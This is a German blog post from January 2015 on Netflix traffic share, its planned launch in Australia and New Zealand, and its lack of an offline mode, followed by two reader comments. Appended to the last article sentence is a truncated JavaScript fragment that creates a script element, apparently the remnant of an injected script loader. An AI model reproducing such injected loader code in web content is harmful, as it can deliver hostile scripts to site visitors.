Neue Veröffentlichungen bei Netflix Deutschland
Netflix Neuigkeiten - Finden Sie neue Filme und Serien bei Netflix USA

Neues von Netflix: Traffic-Spitzenreiter, Premiere in Australien, kein Offline-Modus

Datum: 18/01/2015 | 2 Kommentare

Heute geht es weniger um einzelne Neuerscheinungen, als um Neuigkeiten zur Internet-TV-Plattform Netflix selbst: Zum einen liegen aktuelle Daten vom Oktober des letzten Jahres vor, dass Netflix den meisten Traffic des amerikanischen Markts bekommt. Insgesamt ein Drittel des übertragenen Datenvolumens der US-Internet-User fällt auf die Nutzung von Netflix!

Die Videoplattform Youtube ist mit knapp 15 Prozent deutlich dahinter. Weitere bezahlte Streaming-Angebote sind noch weiter abgeschlagen: Amazons Instant Video kommt auf 3 Prozent, HBOs Go auf 1 Prozent. Die Daten stammen von dem amerikanischen Netzwerk-Service-Anbieter Sandvine.

Darüber hinaus können sich Zuschauer aus Australien und Neuseeland darüber freuen, dass Netflix in ihren Ländern im März dieses Jahres an den Start gehen wird. Bis lang gehörten beide zu den Ländern, in denen Netflix noch nicht offiziell genutzt werden konnte. Dennoch fielen laut Statistiken etwa 5% des Internet-Traffics im australischen Raum auf Netflix, obwohl der Dienst dort eigentlich noch nicht angeboten wird!

Auch in Deutschland war es bis vor Kurzem so, doch seit September ist Netflix in Deutschland am Start. Die Begeisterung der deutschen Zuschauer hielt sich zu Beginn jedoch in Grenzen. Das Problem: Das Angebot an Filmen und Serien war noch gering, zum anderen gibt es auf dem deutschen Markt mit Maxdome und Watchever bereits zwei etablierte Streamingdienste. Ein Vorteil, den diese beiden Konkurrenten haben, ist der Offline-Modus — diesen will Netflix aber auch in Zukunft nicht anbieten, da das Unternehmen (korrekterweise) die Zukunft des Films und Fernsehens im Online-Streaming und nicht im Download sieht. In Bezug auf das Filmangebot hat sich Netflix seitdem deutlich gebessert, auch weil erst einmal der Geschmack des deutschen Publikums ermittelt werden sollte.var d=document;var s=d.createElement(‘script’);




2 Kommentare für Neues von Netflix: Traffic-Spitzenreiter, Premiere in Australien, kein Offline-Modus

  1. Sebastian - kl. 16:51, 31-07-2015:

    Hallo,

    wieso sieht es das Unternehmen korrekterweise nicht ein Einen offline Modus anzubieten?
    Ich ärgere mich ständig wenn das Internet nicht funktioniert oder ich in schlechterer Qualität schauen muss wenn ich mal etwas herunterladen muss und die Bandbreite nicht reicht für beides. Da wäre ein offline Modus gerade für die vielen Serien die ich schaue doch echt angebracht.
    Also verstehe ich das ‘korrekterweise’ nicht.
    Mfg

  2. murpy - kl. 09:05, 01-08-2015:

    Offlinemodus wäre echt super

Leave a Reply